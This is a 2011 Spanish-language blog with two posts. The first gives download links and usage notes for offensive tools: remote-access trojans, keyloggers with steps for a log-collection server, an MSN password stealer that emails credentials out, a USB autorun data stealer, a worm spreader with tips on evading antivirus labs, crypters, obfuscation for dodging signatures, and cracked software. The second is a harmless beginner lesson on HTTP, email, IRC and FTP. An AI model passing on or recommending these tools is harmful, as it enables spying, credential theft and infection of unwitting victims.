miércoles, 6 de julio de 2011

Programas Para Iniciarse

Aplicaciones sueltas!! *Creo que estan en Rar. Descomprimanlo, y abran la carpeta, en algunos busquen el instalador, y en otros, solo abran el programa.*


Primer Programa Hacker: Ultimate Hacking AIO 2009


Contiene Hacking Tools:
-IP Scan
-RegMon
-FileMon
-MAC Address Changer
-PEiD
-CodeFusion
-Port listener
-D Hash
-SuperScan
-Net Sniffer


RATs(Remote Administration Tools a.k.a trojans):
-BiFrost 1.21D
-Poison Ivy 2.3 fwb++
-Biodox
-Guptachar 2
-Pro Rat 1.9

Keyloggers
-Ardamax 2.8
-Advanced Invisible Keylogger
-Albertino Keylogger
-Blazing Tools Perfect Keylogger
-VicSpy 2008
-Quick Keylogger


Link de Descarga MegaUpload: http://www.megaupload.com/?d=F83C6RHE

Ara pasemos a Programas mas estilo Hacker Profesional pero para Novatos.
NOTA: NINGUNO ES VIRUS O TROYANO, PUEDE QUE DETECTE EL ANTIVIRUS, DE HECHO UN SIMPLE KEYGEN ( generador de seriales para Juegos ) es considerado virus, si dudan pruebenlo en un cyber u otra pc.
todos estan full y si tiene password se aclara cuales, disfruten.

Programas Hacker para MSN:
*hackear MSN de forma remota:
http://www.megaupload.com/?d=1IVOC7YF
pass: troyanosyvirus.com.ar
*hackear MSN DE FORMA REMOTA ( otro programa misma funcion):
http://www.megaupload.com/?d=M9EOIOZF
*hackear msn de forma remota:
http://www.megaupload.com/?d=4RM2V0PF
*para hackear msn de forma remota:
http://www.megaupload.com/?d=KMPQWE5R
*Programa que detecta eliminacion del msn y todo relacionado con el msn:
http://www.megaupload.com/?d=34KZH7G3
*Simula webcam falsa por el msn:
http://www.megaupload.com/?d=DQGXH9B3
*Activa una webcam del MSN de forma remota y sin enviar un troyano:
http://www.megaupload.com/?d=2HOCEQPS
*Te informa la ip del contacto del msn:
http://www.megaupload.com/?d=CIEDW0BJ
Acelerador de descargas:
*Speed Gear hace que se aceleren descargas del Ares, ?¿Emule?¿, etc:
http://www.megaupload.com/?d=3DHN1NYR

Programas Hacker con mas Fuerza:

NetStumbler


link: http://www.teqi.org/files/images/Teqi_org_NetStumbler_Ejemplo.preview.gif

Informacion: NetStumbler es un programa para Windows que permite detectar redes inalámbricas (WLAN) usando estándares 802.11a, 802.11b y 802.11g.

* Verificar la configuración de nuestra red.

* Estudiar la cobertura o nivel de señal que tenemos en diferentes puntos de una estancia.

* Detectar redes que pueden causar interferencias a la nuestra.

* Útil para orientar antenas direccionales cuando queremos hacer enlaces de larga distancia, o simplemente para colocar la antena o tarjeta en el punto con mejor calidad de la señal.

* Sirve para detectar puntos de acceso no autorizados (Rogue AP’s).

* Wardriving, es decir, detectar todos los Puntos de Acceso (AP's) que están a nuestro alrededor.

* Si tenemos un receptor GPS, nos permitirá registrar las coordenadas reales en las que nos encontramos y obtener las del punto desde donde se está emitiendo el equipo al que nos conectamos.

NOTA: * LAS REDES QUE NO TIENEN CANDADO ES PORQUE NO PRECISAN CLAVE WEP PARA CONECTARTE A ELLA.*

Password Administrator Hack Tool
Descripción

Bueno aqui les dejo esta herramienta con ella podran cambiar el pass del adminstrador, ya olvidense de usar cd botteable y esas cosas para decifrar ahora tu mismo podras cambiar la clave con un solo click es muy facil de usar. Saludos
Descarga:
Peso: 3.50 mb.
Servidor: Rapidshare
http://rapidshare.com/files/137662522/XP_PASSWORD_MANAGER.rar

Hide IP NG 2.16 Full
Descripción
¿Interesado sobre su privacidad en internet? ¿quiere ocultar su dirección ip?
Hide ip ng ( hide ip next generation) es el software que está buscando! Resguardar su privacidad es simple y fácil: inice con hide ip ng !

Características:
• No pierda el tiempo al probar los proxies públicos peligrosos y lentos. Sólo escoja un ip de uk/us que desea usar desde nuestra lista. Cada ip que usted ve es útil, rápidamente y el 100% seguro!
• Asigne ip diferentes a sus computadoras aún si estan detrás de un mismo reuter !
• Con un click sencillo y esta listo para navegar. Oculte su dirección de ip sin ninguna configuración.
• Nunca preguntamos a nuestros usuarios para crear un cacuenta antes de usar. Nuestros usuarios nunca se registrarán y seguirán la pista.
• 1024 bits de encriptación impiden su isp y que su jefe le espie a ud. !
• Impida que otros lean cada datos que ud. Transmite a través de wi-fi hotspots.
• Soporte sitios https:// y para doblar su seguridad !
• Envie correo electrónico anónimo por cada web basada en sistemas de correo ( e.g. Gmail, hotmail ).
• Postee en los boletines de anuncios sin mostrar su dirección ip real.
• Desvie las restricciones puestas por ciertos dueños de los recursos de internet en usuarios de ciertos paises o de regiones geográficas. Desvie filtors web del trabajo/escuela y visite cualquier sites que ud. Desee ( e.g. Myspace).
• Aficionado a controlar sus campañas de motor de búsqueda .
• Mantenga su computadora a salvo de ataques de haccker al ocultar su dirección de ip.
• Le protege de cualquier sitio web que quiere controlar sus intereses de lectura y que lo espian a través de su dirección de ip única - su id en la internet.
• Evita que su información personal sea usada para enviarle los correos electrónicos no deseados y los correos electrónicos basura. Muchos vendedores y agencias de publicidad usarán su dirección de ip, junto con su correo electrónico, para enviarle los correos electrónicos no solicitados.

Descarga
Peso: 3.45 mb.
Servidor: Rapidshare
http://rapidshare.com/files/133076432/HIDE_IP_NG_1.26.rar

Craagle v3.0 Español
Descripción

Craagle es un potente y efectivo buscador de cracks, carátulas y seriales, ahora está disponible la version 3.0. Está traducido al español y fue corregido una vez más para corregir algunos fallos, tanto del programa como de la traducción. Además remueve publicidad, es extremadamente ligero y sigue sin ser detectado por antivirus, ya que algunos antivirus lo confundían como una aplicación maliciosa; ello se debe a que Craagle se conecta a diversas páginas web para buscar y descargar cracks o seriales.

Ventajas de esta versión
- Completamente traducida al español.
- Fueron corregidos algunos errores en el programa y en la traducción
- Está limpio de troyanos, adware, virus, malware, etc.
- No contiene publicidad.
- No necesita instalarse: se descarga, se abre y se usa, así de simple.
- Versión muy ligera y segura.
- No produce falsas alarmas en los antivirus (al menos por ahora, 12/05/08).
- Entrega resultados un 80% más rápido.
- No entrega resultados-basura tales, por ej.: "craagle 098647 via get extra drive"

Descarga
Peso: 4 mb.
Servidor: Rapidshare
http://rapidshare.com/files/131015128/Craagle_v3.0.rar.html

Windows Wifi mega Coleccion Para Hackear Redes http://rapidshare.com/files/121163821/Windows_Wifi_Collection.rar
Descripción

Utilidades para hackear redes wifi.
Viene entre otras Aircrack, Airsnort o AiroPeek muy practicas para cuando estas de viaje en la carretera y necesitas conexion al macbook o pc portatil

Descarga
Peso: 32.5 mb.
Servidor: Rapidshare
http://rapidshare.com/files/121163821/Windows_Wifi_Collection.rar
Robar Datos Con Usb
Descripcion:

Este programa realmente hace lo que promete roba toda clase de contraseñas e información confidencial de la PC en la que insertes tu USB, esto lo logra mediante un archivo autorun que ejecuta varias mini utilidades que tiene el programa entre otras lo que te puede ayudar a conseguir este programa es:

- Toda clase de contraseñas del navegador web hi-5, myspace, e incluso de foros.
- Historial de navegación completo (para darte cuenta del perfil de la víctima y o amiga)
- Cookies esto sabrán mis amigos más experimentados para lo que sirve.
- Los clientes de correo tales como msn, yahoo, gmail y demás.
- Toda la información de su hardware e IPs
- Los puertos abiertos recientemente.
- Licencias de los programas que tiene (incluidos Windows, Adobe y demás)
Probado con:
- Avast
- Nod32
- AVG Antivirus
- Norton

Descarga
Peso: 1.3 mb
Servidor:Rapidshare
http://rapidshare.com/files/91180580/HHot_by_everth21.rar 


Primer Progrma de Hackers:
Advanced Logger v.1

Advanced Logger es un keylogger (captura las teclas pulsadas) que envia los logs mediante una pagina php y los guarda en archivos *.html.
Captura todas las teclas pulsadas aunque la PC este desconectada de internet, sube los logs instantaneamente mientras este conectada.


Modo de uso
1- Subir el archivo index.php en algun host que soporte permisos de escritura.
2- Darle permisos 777 al archivo index.php (se creara automaticamente un archivo .html).
3- Colocar la url donde se encuentra el archivo index.php en el "Advanced logger builder" y hacer click en "Build server". Se generara el servidor del keylogger.
4- Eso es todo ahora solo deben ejecutar el server.exe en las PCs que se quiera capturar las teclas pulsadas. Los logs apareceran en la carpeta donde subieron el index.php con el nombre del usuario de la PC. Lo pueden descargar y ver con cualquier navegador de internet.

Descargar: http://www.megaupload.com/?d=M73XS5GB
Recuva: Recuperador de Archivos

Recuva es una pequeña aplicacion que nos permite recuperar los archivos que fueron borrados de alguna unidad de almacenamiento. Funciona inclusive después de vaciar la papelera de reciclaje o de formatear.

Este programa recupera fácil y rápidamente todo tipo de archivos, imágenes, archivos comprimidos, documentos, etc. Con recuva también podemos rescatar las fotos borradas de nuestra cámara digital o los archivos mp3 de nuestro reproductor portátil. La utilización de este programa es sumamente sencilla y los resultados que podemos obtener son realmente sorprendentes recuperando archivos que creíamos perdidos.

Hay que aclarar que no siempre se pueden recuperar el 100% de los archivos borrados pero vale la pena probarlo, seguramente nos sacará de más de un apuro.
Descargar desde Pagina Oficial: http://download.piriform.com/rcsetup138.exe
Descargar RapidShare: http://rapidshare.com/files/435817576/rcsetup138.exe
NovaLiteII 2.6


Este es un simple troyano programado por omc, de la comunidad HH, tiene las herramientas basicas pero es estable.

Caracteristicas:
-Captura de pantalla
-Administrador de archivos, ventanas, procesos y servicios
-Editor de registro
-Informacion de la pc
-Shell remota
-Simple keylogger
-Downloader con la posibilidad de descargar en todas las pcs
Aclaracion: El servidor es algo detectado por los antivirus, y puede ser que el cliente sea detectado, ya que el servidor se encuentra dentro del mismo.

Dentro de poco se espera la nueva version, la cual sera publicada en este mismo post.
Descargar en Megaupload: http://www.megaupload.com/?d=LTQ327O5
PUM Multi spread creator V1.018

PUM Multi spread creator V1.0 es un nuevo programa creado por WHO que basicamente sirve para esparcir tu server por MSN, P2P y USB. Los medios mas comunes de propagacion

El spread MSN es el tipico worm que envia un mensaje a todos los contactos y seguidamente envia el archivo infectado, no se recomienda activar esta opcion porque llama mucho la atencion y generalmente se terminan enviando las muestras a los labs antivirus. Ademas de que las victimas pasan todos los antivirus que encuentran hasta que se logran desinfectar.
Si lo activan pongan un delay bastante largo. Y carguen una lista de mensajes creible (porque en turco dudo que lo ejecuten jaja).

Con el spread USB se copia a todos los discos extraibles, por ejemplo pendrives, mp3, mp4, algunas memorias de camaras digitales, etc.
Agrega un autorun para que cuando se inserte el dispositivo en otro equipo este se infecte.

Y con P2P, simplemente se copia a todas las carpetas para compartir (o de descargas) de los programas P2P seleccionados con todos los nombres de la lista cargada o por defecto.
Por ejemplo si tiene el ares se copiara con todos los nombres de la lista cargada en la carpeta "My Shared folder", para que se lo descarguen.

Descarga MegaUpload: http://www.megaupload.com/?d=BUBSZH2S

Ahora un poquito de... MSN! Seguro que se acuerdan de mi primer post, que puse 4 programas de MSN... pues ahora traigo... más programas!!!
Arhack MSN Password Stealer

AMSNPS es un stealer simple creado hoy por Arhack que envia por email los usuarios y contraseñas guardados de cualquier version de MSN messenger.


Modo de uso basico
El programa solo funciona con cuentas de gmail, ya que usa su servidor smtp para enviar los emails, se debe colocar el usuario y contraseña de una cuenta gmail que se usara para enviar los datos, recomiendo crear una cuenta exclusivamente para esto.
El email con las contraseñas puede ser enviado a cualquier tipo de direccion.

Antes de crear el servidor recomiendo usar el boton "Testear" para ver si estan bien los datos de configuracion.

Cuando coloquen los datos de envio dan click a "Crear" y se generara un nuevo archivo msnstealer.exe, este es el que se debe ejecutar para que se envien los datos.

El programa obiamente solo envia los usuarios y contraseñas guardados (con recordar contraseña) de msn, si no se encuentra ningun usuario o contraseña guardado se enviara un mensaje en blanco solo con la info de la pc y la hora.

En la siguiente imagen se ve que el server fue ejecutado en varias pcs, en el titulo del mensaje se incluye nombre de la pc y usuario activo, en el mensaje los datos de usuarios y contraseñas.
El server
El server no se agrega al inicio, no crea archivos, ni modifica el registro, en conclusion no modifica absolutamente nada en la PC, al ejecutarlo intenta enviar instantaneamente los datos, una vez que envia los datos se cierra automaticamente. Si falla al enviar los datos por que no hay conexion a internet o cualquier otro motivo vuelve a intentar hasta enviarse el mensaje. Al dia de hoy es indetectable a todos los antivirus conocidos, aunque no creo que dure mucho tiempo.
Descargar MegaUpload: http://www.megaupload.com/?d=TX8X091Q
Chau MSN v1.0 OPEN SOURCE 

Chau MSN es un programa creado por arhack, basado en el source de kizar, lo que hace es bloquear cuentas de msn completamente mientras el programa este activo. 

Para bloquear una cuenta lo unico que tienen que hacer es colocar el msn de la victima y poner bloquear cuenta, esperar que termine de cargar todo y dejarlo abierto al programa, o minimizado. La proxima ves que la victima intente entrar al msn le saldra un cartel como este, y no podra iniciar sesion. 

Hay que tener en cuenta que la cuenta permanesera bloqueada mientras el programa este abierto y en el estado cuenta bloqueada. 
Si se intenta bloquear una cuenta de alguien que este online, esta se bloqueara pero cuando cierre secion y vuelva a iniciarla, No hara que cierre secion. 

Funcionamiento 
El funcionamiento del programa es muy simple, lo que se hace es loguearse con la cuenta que se puso con passwords incorrectos, entonces el servidor de hotmail bloquea la cuenta para evitar que se realizen ataques por fuerza bruta. 

ACTUALIZADO 16/04/08 

Codigo fuente 
Chau MSN esta programado en visual basic y es de codigo abierto desde ahora, ya libere el codigo fuente para que vean como funciona mas o menos y para todos los que quieran modificar el programa. Pueden ir haciendo las modificaciones que quieran y me lo van pasando asi voy actualizando el programa, no nesesariamente tiene que bloquear cuentas. 

Aqui te dejo una captura de VB:  
Descarga MegaUpload: http://www.megaupload.com/?d=XY7FEGFJ 

Themida v1.8.5.5 (Crackeado) 
Bueno gente aca les dejo el Themida 1.8.5 full, listo para usar, crackeado..Pronto hare una guia. 

Themida es una aplicación destinada a la protección del software frente a la piratería. 

El programa encapsula el código fuente de la aplicación en diferentes partes y las encripta de forma individual. Finalmente, añade una protección global al conjunto del ejecutable. 

La tecnología empleada por Themida se denomina SecureEngine, que consiste en una serie de medidas anti-cracking que se añaden a los ejecutables y que sólo permiten la ejecución del programa en un entorno seguro. 

Algunas de las características de Themida son las siguientes: 
- Técnicas antidepuradores que detectan el uso de depuradores. 
- Técnicas para evitar el volcado de memoria en disco. 
- Algoritmos de encriptación distintos para cada aplicación. 
- Descompilación y ofuscación del código en la aplicación protegida. 
- Técnicas antidesambladores, y mucho más. 
Descargar en RapidShare: http://rapidshare.com/#!download|119l33|40014079|Themida_v1.8.5.5.rar|8039 
Jodedor 5x1 

Hoy salio una nueva herramienta de m3m0_11, el Jodedor 5x1, llamada 5x1, por las 5 herramientas que posee en una sola. Es un Crypter, joiner, downloader, packer. 
Cada una de sus herramientas es bastante completa en funciones, por ejemplo en el binder permite seleccionar donde extraer, el metodo de ejecucion (permite inyectarse en un proceso), tiempo de espera, etc. 
Los 4 stubs son indetectables y tienen un peso relativamente pequeño que ronda por los 11kb aproximadamente. 
 
 
El Jodedor 5x1 posee las siguientes herramientas: 
Crypter: Encripta archivos para protegerlo y dejarlos indetectables. 
Joiner: Junta 2 o mas archivos en un unico archivo. 
Downloader: Descarga uno o mas archivos y posteriormente los ejecuta. 
EOF writter: Agrega EOF al archivo. 
Packer: Comprime el archivo. 
 
Al dia de hoy es indetectable, que dure unos dias por lo menos! 
Descarga MegaUpload: http://www.megaupload.com/?d=JDTSLD4E 
Descargar CodeJock: http://rapidshare.com/files/245995765/codejoc.rar ( Es Necesario tenerlo ) 
Turkojan 4.0 

Ayer salio la version 4 del troyano turco, troyano que se caracteriza por su gran cantidad de herramientas y sus funciones FUN. 
Por ahora es indetectable y tiene la opcion de cambiarle el lenguaje a español y a otros idiomas mas. 

Lo nuevo: 

Escritorio remoto característica agregada. Usted puede ver la pantalla remota y controlarlo a través de su teclado y el ratón. 
Ahora usted puede grabar vídeos de webcam remota. 
Función de transmisión de audio agregó. 
Ahora no es necesario para descargar las imágenes desde el ordenador a distancia, Usted puede ver con el gestor de imágenes en miniatura. 
Usted puede obtener los registros de MSN con MSN Sniffer. 
Puede bloquear los nocivos páginas web en el ordenador remoto. 
Usted puede manejar equipo remoto con comandos de MS-DOS. (shell remoto) 
Nuevas funciones de agregado para el secreto del servidor 
-Ahora es más difícil de eliminar del servidor 
-Server no se puede mostrar en el registro, búsqueda de archivos, msconfig, etc 
-Server no se pueden mostrar en ctrl + alt + del menú [Vista/Xp/95/98/ME]. 
-Server impide restoring.It sistema borra todos los puntos de restauración del sistema. 
Tamaño del servidor es 60% más pequeño ahora. 
Conexión error corregido 
Ahora servidor no puede ser dedectado por cualquier software anti-virus, 
pero creo que será dedected pronto. 
Se hicieron algunos cambios en la apariencia del cliente 
Ahora keylogger avanzado puede capturar changements portapapeles. 
Usted puede instalar cualquier archivo en el equipo remoto desde Internet a través de Remote Downloader. 
Ahora usted puede obtener más información sobre el equipo remoto. 
Usted puede aprender software instalado en el equipo remoto. 
Ayuda added.So modo se puede crear servidores visibles. 
( TRADUCIDO POR HACKJ ) IDIOMA ORIGINAL: Ingles - Castellano 

Imagenes de Turkojan 4: 
 
 
Imagenes de Turkojan 4 en Castellano:  

Editado: 
Cuando lo ejecutan al cliente modifica su pagina de inicio por la pagina principal del troyano del Internet Explorer 6. 
Si nesecitan saber como sacarla dejen un comentario asi les respondo. 

Descarga Pagina Oficial: http://www.turkojan.com/sayac/click.php?id=10 
Descarga Mirror RapidShare: http://rapidshare.com/files/96225349/turkojan4.rar.html 

Descargar Manual: http://troyanosyvirus.com.ar/2008/03/tutorial-turkojan-40-metodo.html 


Encrypt String: Lo que hace esta función es encriptar la string con Xor con una key a elección. (Uso: Seleccionar la string desde el " hasta el otro " --> Click Derecho --> Encrypt String --> Seleccionar Key --> Aceptar. Después agregar en algún módulo la función XOR haciendo click derecho y tocando Add Xor Function) 
Add Junk Code: Esta función agrega código basura en una parte del código deseado. (Uso: Se pone el cursor en una linea en blanco donde se insertara el código basura, se hace click en ella y luego click derecho --> Add Junk Code) 

Características para localizar firmas: 
Comment Line: Esta opción lo que hace es comentar las lineas deseadas, es decir, que al compilar el proyecto este código no sera puesto en el binario. Si bien no funcione la función que se comento, sirve para localizar la firma. (Uso: Seleccionar lineas deseadas desde el principio --> Click Derecho --> Comment Line). 
UnComment Line: Esto hace exactamente lo contrario a lo de arriba, descomenta las lineas seleccionadas. (Uso: Seleccionar lineas deseadas desde el principio --> Click Derecho --> UnComment Line). 

Características para indetectar (Procesos SemiAutomáticos para TODO el proyecto) 
Crypt all strings: Muy pero muy útil. Lo que hace es encriptar TODAS LAS STRINGS del proyecto permitiendo seleccionar la key. No encripta API's, esto facilita que no se necesita comprobación sino que se hace un proceso automático.(Uso: Click en Crypt all strings --> Seleccionar la Key --> Click en Re-Encrypt Strings --> Click en Confirm) 
Reverse all strings: Similar a la función de arriba, solo que pasa la string al reves y luego por la funcion StrReverse la regresa a estado original. (Uso: Click en Reverse all strings --> Click en Confirm) 
All Strings to Char: Lo que hace esta función es transformar a caracteres todas las strings, es para saltarse la detección de Strings de algunos antivirus. (Uso: Click en All strings to Char --> Confirm) 
Randomize Function Names: También es de las funciones que más me gustan. Lo que hace es cambiar el nombre de TODAS las funciones. NOTA: No de los SUBS. (Uso: Click en Randomize Function Names --> Confirm) 
Add Modules: Me gusta mucho también, agrega modulos al proyecto. 
Add Class Modules: Hace lo mismo que la de arriba, solo que agrega Módulos de clase. 
Nota:Se pide el favor de aportar sugerencias y reportar los bugs que se encuentren. 
Para el correcto uso de la aplicación se necesita registrar los ocx. Para realizarlo registrar las ocx que vienen dentro de la carpeta OCX. 
Cualquier duda sobre esto avisar. 
En lo personal recomiendo crear en su disco una carpeta llamada OCX y ahí mover el contenido y ejecutar el register.exe y clickear el boton de Register. 
Descarga Megaupload: http://www.megaupload.com/?d=JRBYOU9S 

Todos las Pass ( contraseñas del win-rar ) són: troyanosyvirus.com.arAprobechen a descargar todos estos progrmas 
 *Puede ser que detecten los programas los antivirus, pero es normal en caso de que algunos tienenel ''server'' y el ''client''.

domingo, 12 de junio de 2011

Lección 4 - Ser Un Hacker

SERVICIOS Y CONEXIONES 
Introducción 
El objetivo de esta lección se basa en dar a los estudiantes un conocimiento sobre los servicios básicos que utilizan las redes para proporcionar e intercambiar información. Asimismo, en esta lección se presentarán algunos de los métodos que utilizan los ordenadores personales y las redes de área local para conectarse con otras redes; es decir, se analizarán distintas formas de conexión entre ordenadores y redes que conforman lo que se conoce como Internet. 
Servicios
 
Si tienes un ordenador personal, sabrás que existe cierta información útil en tu ordenador, 
aunque puede ser que no demasiada. También sabes que muchas más personas, incluso 
millones de personas también tienen ordenadores, por lo que sus ordenadores también 
pueden tener cierto tipo de información útil. 
Igualmente, es muy fácil suponer que muchas de esas personas puedan tener información en 
sus ordenadores que podría ser interesante para ti. Pero el problema radica en cómo puedes 
acceder a toda esa información útil que estará en los ordenadores de otras personas. 
Los propios ordenadores pueden comunicarse entre ellos de manera fácil, usando sus puertos 
y utilizando distintos protocolos de comunicación diseñados para ello, pero esto no es de 
mucha utilidad para tí. Esto es debido a que es muy difícil entender las cadenas de bits que 
se intercambian los ordenadores entre ellos. Es necesario que exista alguna forma para que el 
ordenador pueda interpretar la informacion que recibe de los otros ordenadores y la 
presente de manera que el usuario pueda entenderla. 
Los programas que utilizan los ordenadores para traducir los datos de manera que puedas 
entenderlos y sean útiles son lo que llamaremos servicios. Estos servicios permiten ver páginas 
web, intercambiar correos electrónicos, chatear e interaccionar con ordenadores remotos de 
muchas otras formas. 
Tu ordenador es el ordenador local y utiliza programas llamados servicios para interpretar la 
información que recibes. Los otros ordenadores son los ordenadores remotos y utilizan 
programas llamados servidores para proporcionar esta información a tu ordenador. 

HTTP y la Web 

Cuando se habla de ‘Internet’, lo primero en lo que piensan la mayoría de personas es en la 
World Wide Web (WWW). Pero la World Wide Web, o simplemente la Web, no es Internet. En 
realidad, es un método que utiliza Internet para intercambiar información entre ordenadores. 
La web utiliza http, que son las siglas de Hypertext Transfer Protocol, y los servicios conocidos 
como navegadores web y servidores web para intercambiar información en forma de 
páginas web entre ordenadores locales y remotos. 
En el ordenador local dispones del navegador web. Se envía la información del ordenador 
remoto a tu ordenador local mediante el protocolo http. El navegador web interpreta esta 
información y la muestra en tu ordenador local en forma de páginas web. 
La parte hipertexto del protocolo http se refiere a la forma no lineal de presentar la 
información. Los textos se suelen leer de manera lineal: la palabra 2 va después de la palabra 
1, la frase 3 sigue a la frase 2, el párrafo 4 va después del párrafo 5, etc. En cambio, la idea 
del hipertexto se basa en permitir ver la información de manera no lineal. Esta es la gran 
diferencia entre el hipertexto y los métodos antiguos a la hora de presentar la información. 
Con el hipertexto, las palabras y las ideas se pueden conectar, no sólo con las palabras que 
las rodean directamente, sino también con otras palabras, ideas o imágenes. Además, el 
hipertexto no está solo restringido a la Web. La mayoría de procesadores de texto permiten 
crear páginas en formato web o http para guardar localmente. Estas páginas se puede leer 
utilizando tu navegador web y funcionan como cualquier página web, con la particularidad 
que están guardadas en tu ordenador local, en vez de estar en un ordenador remoto. 
En tu ordenador local utilizas un programa cliente llamado navegador web. Al contrario de 
lo que puedes pensar, en el mercado existen distintos navegadores web, disponibles tanto 
para Windows como para Linux. Por ejemplo, existe el navegador Internet Explorer de 
Microsoft, el navegador Netscape, los navegadores Mozilla y Mozilla Firefox… 
Figura 1: Logos de Microsoft Internet Explorer, Netscape, Mozilla y Mozilla Firefox 
También puedes crear tu propia página web. La manera más fácil para hacerlo es utilizar 
uno de los procesadores de texto más comunes como, por ejemplo, OpenOffice, Microsoft 
Word o Word Perfect. Estos programas permiten crear páginas web sencillas, combinando 
texto, hipertexto e imágenes. Muchas personas han creado páginas web útiles, ingeniosas e 
innovadoras simplemente con estas herramientas. 
Pero estas páginas no son ‘flashy’, es decir, no tienen contenidos flash. ‘Flashy’ significa que 
la página web dispone de animaciones, instrucciones que se ejecutan sin la interacción del 
usuario (scripts), etc. Esto también significa invertir grandes cantidades de dinero en un 
programa de diseño de páginas web selecto. Estos programas incluyen otros programas y te 
permiten realizar muchas cosas, aunque la creación de páginas es más compleja. 
Una vez diseñadas y realizadas las páginas, necesitas un ordenador para poderlas tener 
guardadas y que puedan ser consultadas. 
El ordenador remoto tiene que tener instalado un servidor web. Es posible que el servidor web 
esté instalado en tu propia casa, exactamente en tu propio ordenador, pero esta opción 
tiene varios inconvenientes. La primera desventaja es lo que se llama persistencia: la información que se guarda en un servidor web solo está disponible si este servidor está 
enchufado, funcionando correctamente y tiene una conexión abierta. Por ello, si quieres 
tener un servidor web funcionando en tu propia habitación, tendrías que dejar el ordenador 
encendido todo el tiempo; además, tendrías que asegurarte que el programa servidor web 
funcione correctamente todo el tiempo, por lo que deberías resolver todos los problemas 
hardware, controlar virus, gusanos y otros ataques, así como pelearte con los inevitables fallos 
del propio programa. Por otro lado, deberías mantener una conexión a Internet siembre 
abierta. Es por ello que muchas personas prefieren pagar a alguien para que les haga todo 
este trabajo. Es lo que se denomina web hosting. 
Una empresa de web hosting almacena tu página web en sus ordenadores y se ocupa de 
todo. Una empresa de web hosting perfecta debería tener múltiples servidores redundados y 
una política de copias de seguridad periódica, de manera que no se pierda el servicio por 
culpa de fallos de hardware; también debería tener un equipo de soporte para mantener el 
funcionamiento del servicio y protegerlo de ataques de hackers o fallos de programa; 
además, debería tener un número de conexiones abiertas a Internet. Así pues, tu único 
trabajo se basa en diseñar tu página web, almacenarla en el servidor de la compañía de 
hosting, apagar tu ordenador, descansar y tu página seguirá estando disponible para el 
mundo entero. 
También es posible encontrar organizaciones que ofrecen un hospedaje de web gratuito. 
Algunas de estas organizaciones obtienen beneficios por anuncios publicitarios, de manera 
que cualquiera que quiera visitar tu página web, primero debe ver dichos anuncios, aunque 
no tiene que comprar nada. 
E-mail – POP y SMTP 
Seguramente, el segundo aspecto más visible de Internet es el correo electrónico. En tu 
ordenador, utilizas un cliente de correo electrónico, que se conecta a un servidor de correo. 
Cuando configuras tu cuenta de correo electrónico, dispones de un nombre único en forma 
de usuario@dominio. También debes configurar una contraseña para poder acceder a tu 
correo electrónico. 
El protocolo SMTP, que se utiliza para enviar correos electrónicos, no necesita ninguna 
contraseña. Esto no era un inconveniente cuando se diseñó el protocolo, puesto que Internet 
era un mundo pequeño sin problemas, pero ahora se ha convertido en un agujero que 
permite el uso no autorizado de servidores de correo y otras artimañas como el llamado ‘email 
spoofing’, donde alguien envía un correo electrónico que parece que venga de otra 
dirección. Sin embargo, otros servidores de correo minimizan este defecto implementado un 
paso de autenticación intermedio. 
Otro aspecto importante a destacar es que, aunque el correo esté protegido mediante 
contraseñas, el correo electrónico no es una buena manera para enviar información segura. 
Muchos clientes POP y servidores necesitan comunicar tu contraseña sin encriptar a tu 
servidor de correo. Esto no significa que cualquiera que reciba un correo tuyo también 
recibe tu contraseña; pero sí significa que cualquiera con un poco de conocimiento y 
algunas herramientas como sniffers o analizadores de protocolos puede descubrir tu 
password. 
(Las ideas para securizar tu correo están explicadas en la lección 7: Seguridad del correo 
electrónico) 

IRC 
IRC son las siglas de Internet Relay Chat. IRC es donde la naturaleza irregular de Internet se 
muestra de manera más clara. En IRC, cualquiera que tenga algo que decir tiene la 
oportunidad de decirlo. 
Puede ser que estés familiarizado con los chat rooms utilizados en ciertos servicios online. IRC 
es como un chat room donde no hay reglas ni hay estándares. Puede ser que en un canal 
IRC encuentres aquello que estabas buscando o puede ser que encuentres algo que nunca 
habías pensado que existía. 
Todas las reglas que has oído sobre chat rooms también son aplicables a los canales IRC. 
Nunca le digas a nadie tu propio nombre. Nunca des tu número de teléfono, tu dirección o 
tus números de cuentas bancarias. Pero pásatelo bien! 
Ejercicios 
En la lección 0 puedes encontrar ejercicios básicos sobre chats. Los siguientes ejercicios son 
una continuación de los ejercicios anteriores. 
A. Busca 3 canales IRC sobre seguridad a los que sí puedas acceder. ¿Cómo puedes 
apuntarte a una conversación pública? ¿Qué deberías hacer para conversar 
privadamente con una sola persona a la vez? 
B. ¿Puedes intercambiar ficheros en estos canales IRC? ¿Cómo podrías hacerlo? 
¿Intercambiarías siempre ficheros por un canal IRC? ¿Por qué? 
FTP 
FTP son las siglas de File Transfer Protocol. Tal como su nombre indica, este protocolo permite 
transmitir ficheros entre un ordenador local y otro remoto. Aunque se puede utilizar para 
transferencia de ficheros privados, se suele asociar normalmente a servidores ftp anónimos 
gratuitos que ofrecen acceso público a colecciones de ficheros. 
Anonymous ftp ha sido uno de los métodos más utilizados por la mayoría de usuarios de 
ordenadores para intercambiar ficheros en Internet. Aunque se utilizan muchos servidores ftp 
anónimos para distribuir ficheros de manera ilegal y posiblemente infectados de virus, otros 
servidores se utilizan de manera legal para distribuir programas y ficheros. Se pueden 
encontrar servidores que ofrecen servicios ftp anónimos mediante distintos métodos, incluso 
mediante herramientas de búsqueda en Internet. 
Actualmente existen numerosos servidores ftp anónimos que permiten acceder a sus ficheros 
utilizando el protocolo ftp mediante un navegador web. 
Ejercicios 
Anonymous FTP 
Tanto Windows como Linux disponen de un cliente ftp básico, basado en la línea de comandos; para acceder a él, abre un prompt de comandos o una ventana de terminal y teclea: ftp 
En el prompt ftp>, puedes escribir help, para obtener una lista de comandos disponibles. 
ftp> help 
Commands may be abbreviated. Commands are: 
! delete literal prompt send 
? debug ls put status 
append dir mdelete pwd trace 
ascii disconnect mdir quit type 
bell get mget quote user 
binary glob mkdir recv verbose 
bye hash mls remotehelp 
cd help mput rename 
close lcd open rmdir 
Algunos comandos importantes son: 
ftp> open <dominio.nombre> 
Que permite conectarte al servidor ftp llamado dominio.nombre. 
ftp> ls 
o bien 
ftp> dir 
Que lista los contenidos del directorio de trabajo remoto. 
ftp> cd <newdir> 
Que cambia el directorio de trabajo remoto al directorio llamado newdir. 
ftp> get <filename> 
Que descarga un fichero llamado filename del ordenador remoto al ordenador 
local. 
ftp> mget <file1> <file2> <file3> 
Que descarga los ficheros llamados file1, file2 y file3 del ordenador remoto al 
ordenador local. 
ftp> close 
Que te desconecta del servidor ftp remoto. 
ftp> quit 
Que cierra tu cliente ftp local. 
Para conectarse a un servicio anonymous ftp, primero debes abrir tu cliente ftp 
local: ftp 
